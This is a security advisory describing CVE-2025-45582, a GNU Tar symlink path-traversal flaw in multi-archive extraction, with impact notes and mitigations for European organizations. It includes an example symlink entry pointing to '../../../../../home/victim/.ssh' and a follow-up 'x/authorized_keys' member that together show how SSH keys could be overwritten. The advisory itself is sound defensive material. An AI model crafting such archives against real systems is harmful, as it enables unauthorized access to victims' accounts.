CVE-2025-45582 is a path traversal vulnerability classified under CWE-24 affecting GNU Tar versions through 1.35. The vulnerability arises from the way GNU Tar handles symbolic links and relative paths during extraction of multiple TAR archives into the same directory. Normally, Tar blocks extraction of files with '..' in their member names to prevent directory traversal. However, this protection applies only per single archive extraction. An attacker can exploit this by first extracting a TAR archive containing a symbolic link entry (e.g., 'x -> ../../../../../home/victim/.ssh') that points outside the extraction directory to a critical directory. Then, by extracting a second TAR archive containing files with paths starting with the symlink name (e.g., 'x/authorized_keys'), the extraction process follows the symlink and overwrites files in the target directory. This two-step process bypasses the usual traversal checks and can lead to overwriting sensitive files such as SSH authorized_keys, enabling potential unauthorized access. The vulnerability is particularly relevant for server applications or automated systems that extract multiple user-supplied TAR archives into the same directory without resetting or isolating the extraction environment. It also affects software installation processes that run 'tar xf' multiple times on untrusted tarballs, such as package managers or dependency installers that do not verify archive contents or isolate extraction paths. The vulnerability requires local or limited user privileges to supply crafted archives and user interaction to trigger extraction. The CVSS 3.1 score is 4.1, reflecting a medium severity due to the need for multiple steps, user interaction, and limited confidentiality impact but potential integrity and availability impact through file overwrites. No public exploits are known at this time, but the vulnerability highlights a gap in tar's handling of symlinks across multiple extractions.

For European organizations, the primary impact is the potential unauthorized modification of critical files, such as SSH authorized_keys, which can lead to privilege escalation or unauthorized remote access. This can compromise server integrity and availability, especially in environments that rely on automated extraction of multiple TAR archives from untrusted sources, such as CI/CD pipelines, package management systems, or multi-stage deployment processes. The vulnerability could also disrupt software installation or update processes, leading to service outages or compromised systems. Confidentiality impact is limited as the vulnerability does not directly expose data but could facilitate further attacks. Organizations using GNU Tar extensively in automated workflows or shared environments are at higher risk. The medium severity reflects the complexity of exploitation and the requirement for multiple archive extractions, but the potential for critical file overwrite makes it a significant concern for operational security.

To mitigate CVE-2025-45582, European organizations should: 1) Avoid extracting multiple TAR archives into the same directory without cleaning or isolating the extraction environment between extractions. 2) Upgrade GNU Tar to a patched version once available that addresses this symlink traversal issue. 3) Implement strict validation of TAR archive contents before extraction, including checking for symbolic links and relative paths that could lead outside the intended extraction directory. 4) Use containerized or sandboxed environments for extracting untrusted archives to limit filesystem impact. 5) Employ file integrity monitoring on critical directories (e.g., ~/.ssh) to detect unauthorized modifications. 6) Where possible, replace automated extraction of user-supplied TAR files with more secure package management or artifact verification mechanisms. 7) Educate system administrators and developers about the risks of repeated 'tar xf' commands on untrusted archives and encourage following official GNU Tar security guidelines. 8) Monitor logs and audit extraction activities for suspicious patterns indicating attempted exploitation.